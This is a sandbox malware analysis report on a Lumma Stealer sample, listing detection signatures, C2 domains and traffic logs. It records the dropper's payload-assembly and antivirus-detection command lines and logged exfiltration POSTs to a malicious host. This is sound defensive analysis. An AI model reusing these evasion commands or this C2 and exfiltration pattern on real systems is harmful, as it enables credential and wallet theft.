Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HouseholdsClicking.exe

Overview

General Information

Sample name:HouseholdsClicking.exe
Analysis ID:1587455
MD5:c3c0fbe6393929c60e63885bab2603f6
SHA1:09c0cb9efeaa8808710df3f47b3c56fcd323b8bd
SHA256:2fbecbe7ba6ce56cfe6b6da8e7aaf6127755161a7ef340b7b20c2b061404f022
Tags:exeLummaStealeruser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • HouseholdsClicking.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\HouseholdsClicking.exe" MD5: C3C0FBE6393929C60E63885BAB2603F6)
    • cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1740 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4464 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5516 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5252 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6408 cmdline: cmd /c md 19152 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2144 cmdline: findstr /V "Bookmarks" Sv MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5608 cmdline: cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Appliance.com (PID: 4504 cmdline: Appliance.com M MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 480 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "ingreem-eilish.biz", "immureprech.biz", "diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz"], "Build id": "HpOoIh--3fe7f419a360"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                Click to see the 4 entries
                SourceRuleDescriptionAuthorStrings
                10.2.Appliance.com.3d0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HouseholdsClicking.exe", ParentImage: C:\Users\user\Desktop\HouseholdsClicking.exe, ParentProcessId: 3604, ParentProcessName: HouseholdsClicking.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, ProcessId: 2008, ProcessName: cmd.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2008, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5252, ProcessName: findstr.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:22.661289+010020283713Unknown Traffic192.168.2.449737104.102.49.254443TCP
                  2025-01-10T12:06:23.771159+010020283713Unknown Traffic192.168.2.449738104.21.64.1443TCP
                  2025-01-10T12:06:24.707840+010020283713Unknown Traffic192.168.2.449739104.21.64.1443TCP
                  2025-01-10T12:06:25.928436+010020283713Unknown Traffic192.168.2.449740104.21.64.1443TCP
                  2025-01-10T12:06:27.143705+010020283713Unknown Traffic192.168.2.449741104.21.64.1443TCP
                  2025-01-10T12:06:28.329583+010020283713Unknown Traffic192.168.2.449742104.21.64.1443TCP
                  2025-01-10T12:06:29.625250+010020283713Unknown Traffic192.168.2.449743104.21.64.1443TCP
                  2025-01-10T12:06:30.613387+010020283713Unknown Traffic192.168.2.449744104.21.64.1443TCP
                  2025-01-10T12:06:32.305834+010020283713Unknown Traffic192.168.2.449745104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:24.232789+010020546531A Network Trojan was detected192.168.2.449738104.21.64.1443TCP
                  2025-01-10T12:06:25.177022+010020546531A Network Trojan was detected192.168.2.449739104.21.64.1443TCP
                  2025-01-10T12:06:32.770493+010020546531A Network Trojan was detected192.168.2.449745104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:24.232789+010020498361A Network Trojan was detected192.168.2.449738104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:25.177022+010020498121A Network Trojan was detected192.168.2.449739104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.962806+010020582101Domain Observed Used for C2 Detected192.168.2.4537621.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.894226+010020582141Domain Observed Used for C2 Detected192.168.2.4605201.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.934811+010020582161Domain Observed Used for C2 Detected192.168.2.4644531.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.917168+010020582181Domain Observed Used for C2 Detected192.168.2.4546801.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.905518+010020582201Domain Observed Used for C2 Detected192.168.2.4613301.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.882584+010020582221Domain Observed Used for C2 Detected192.168.2.4648891.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.870440+010020586121Domain Observed Used for C2 Detected192.168.2.4510021.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.975796+010020582261Domain Observed Used for C2 Detected192.168.2.4537651.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:21.950791+010020582361Domain Observed Used for C2 Detected192.168.2.4509191.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:31.813411+010020480941Malware Command and Control Activity Detected192.168.2.449744104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T12:06:23.171566+010028586661Domain Observed Used for C2 Detected192.168.2.449737104.102.49.254443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPKAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/api/Avira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/Wn3Avira URL Cloud: Label: malware
                  Source: https://sordid-snaked.cyou:443/apiAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com:443/apiAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/Cj9FAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/api#bqAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/shqKAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/%eAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/)gAvira URL Cloud: Label: malware
                  Source: https://sputnik-1985.com/YAvira URL Cloud: Label: malware
                  Source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "ingreem-eilish.biz", "immureprech.biz", "diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "effecterectz.xyz"], "Build id": "HpOoIh--3fe7f419a360"}
                  Source: HouseholdsClicking.exeVirustotal: Detection: 69%Perma Link
                  Source: HouseholdsClicking.exeReversingLabs: Detection: 60%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.6% probability
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: immureprech.biz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: ingreem-eilish.biz
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString decryptor: HpOoIh--3fe7f419a360
                  Source: HouseholdsClicking.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: HouseholdsClicking.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E2DC54
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E3A087
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E3A1E2
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00E2E472
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00E3A570
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E366DC FindFirstFileW,FindNextFileW,FindClose,10_2_00E366DC
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DFC622 FindFirstFileExW,10_2_00DFC622
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E373D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00E373D4
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E37333 FindFirstFileW,FindClose,10_2_00E37333
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E2D921
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\19152\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\19152Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:60520 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:53762 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058612 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz) : 192.168.2.4:51002 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:53765 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:50919 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:61330 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:54680 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:64889 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:64453 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49737 -> 104.102.49.254:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.64.1:443
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: ingreem-eilish.biz
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: unknownDNS traffic detected: query: deafeninggeh.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ingreem-eilish.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: effecterectz.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: wrathful-jammy.cyou replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: aGpUaEJqSGxZhd.aGpUaEJqSGxZhd replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: immureprech.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: debonairnukk.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: diffuculttan.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: sordid-snaked.cyou replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: awake-weaves.cyou replaycode: Name error (3)
                  Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.102.49.254:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.64.1:443
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K7ZWZ85O1CBNYMQQ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=46BGISZ6K1JZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K7J331VRLLP83P6PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UUC0SH7V04Z9YMTETJPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1290Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N7PIYC5OW1AEA03O2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1135Host: sputnik-1985.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
